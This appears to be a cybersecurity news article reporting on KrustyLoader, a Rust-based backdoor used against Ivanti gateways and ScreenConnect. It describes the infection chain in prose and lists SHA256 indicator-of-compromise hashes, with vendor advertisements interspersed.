[[{“value”:”
Rust’s strong focus on memory safety, which prevents common vulnerabilities such as buffer overflows, makes it a choice for threat actors to use Rust-based backdoors.
Moreover, the performance of this language is appealing to many, and due to this, they prefer using it when creating malware that is both efficient and stealthy.
Not only that, but its quick attack development and support are also well-backed by its community.
Cybersecurity researchers at PolySwarm recently discovered a new rust-based backdoor, KrustyLoader, that is actively attacking Windows and Linux operating systems.
Technical analysis
The cross-platform capabilities of KrustyLoader have recently been highlighted in industry reports targeting Linux and Windows systems.
Document
Integrate ANY.RUN in your company for Effective Malware Analysis
Are you from SOC and DFIR teams? – Join With 400,000 independent Researchers
Malware analysis can be fast and simple. Just let us show you the way to:
Interact with malware safely
Set up virtual machine in Linux and all Windows OS versions
Work in a team
Get detailed reports with maximum data
If you want to test all these features now with completely free access to the sandbox:
The fame of the Linux version of KrustyLoader, which appeared towards the end of 2023 to early 2024 directly on Avanti devices, has been blamed on the Chinese-affiliated hacking collective called “UNC5221.”
UNC5221 (aka UTA0178), a China-linked group, mainly focuses on targeted espionage rather than opportunistic attacks.
However, there is limited info available at the moment, but they employ various malware like:-
CHAINLINE
FRAMESTING
WIREFIRE
LIGHTWIRE
BUSHWALK
WARPWIRE
ZIPLINE
Moreover, there is some evidence that attackers were exploiting ScreenConnect and opted to use it in carrying out their malicious activities using a Windows variant of KrustyLoader.
Exploiting CVE-2024-21887 and CVE-2023-46805, they targeted Ivanti Connect Secure and Policy Secure Gateway.
Rust payloads deployed KrustyLoader, which fetched the post-exploitation tool Sliver.
Although they were patched, the unsecured systems remain vulnerable.
Cybersecurity analysts at WithSecure detected threat actors hijacking ScreenConnect, deploying KrustyLoader’s Windows form.
This Rust-based malware is similar to its Linux cousin that fetches and fires up a secondary payload, frequently called “Sliver.”
In two directories on the compromised system, the threat actors plant r.bat which is a batch file. This script deletes the previous payloads, fetches a random URL hosting KrustyLoader from AWS S3, and then it saves as 1.exe and executes it.
IOCs
e1c31f503da20c8326b566ec042db1f0d3b56fe3579ae37398ff3f6fa5bc54d2
415a70897761c65c3ff59b686d2b1c69a56df06cbf9fbff5dec03751b51d53db
c26da19e17423ce4cb4c8c47ebc61d009e77fc1ac4e87ce548cf25b8e4f4dc28
47ff0ae9220a09bfad2a2fb1e2fa2c8ffe5e9cb0466646e2a940ac2e0cf55d04
95ffea9b7c5c2e18f7fc801290d4bb2777c05e468e5b3e513a597c41ec9b36fc
c7ddd58dcb7d9e752157302d516de5492a70be30099c2f806cb15db49d466026
41aa6b45277445d34060d8cd00a528b08636b86605bbafe643357f2614b66887
e47b86b8df43c8c1898abef15b8b7feffe533ae4e1a09e7294dd95f752b0fbb2
ef792687b8bcd3c03bed4b09c4722bba921536802afe01f7cdb01cc7c3c60815
030eb56e155fb01d7b190866aaa8b3128f935afd0b7a7b2178dc8e2eb84228b0
f93e9bc9583058d82d2d3fe35117cbb9a553d54e7149846b2dc94446f0836201
49062378ab3e4a0d78c6db662efb4dbc680808fb75834b4674809bc8903adaea
816754f6eaf72d2e9c69fe09dcbe50576f7a052a1a450c2a19f01f57a6e13c17
bc7c7280855c384e5a970a2895363bd5c8db9088977d129b180d3acb1ec9148a
You can block malware, including Trojans, ransomware, spyware, rootkits, worms, and zero-day exploits, with Perimeter81 malware protection. All are incredibly harmful, can wreak havoc, and damage your network.
Stay updated on Cybersecurity news, Whitepapers, and Infographics. Follow us on LinkedIn & Twitter
The post New Rust-based Backdoor Attacking Windows and Linux Systems appeared first on Cyber Security News.
“}]] Read More
Cyber Security News
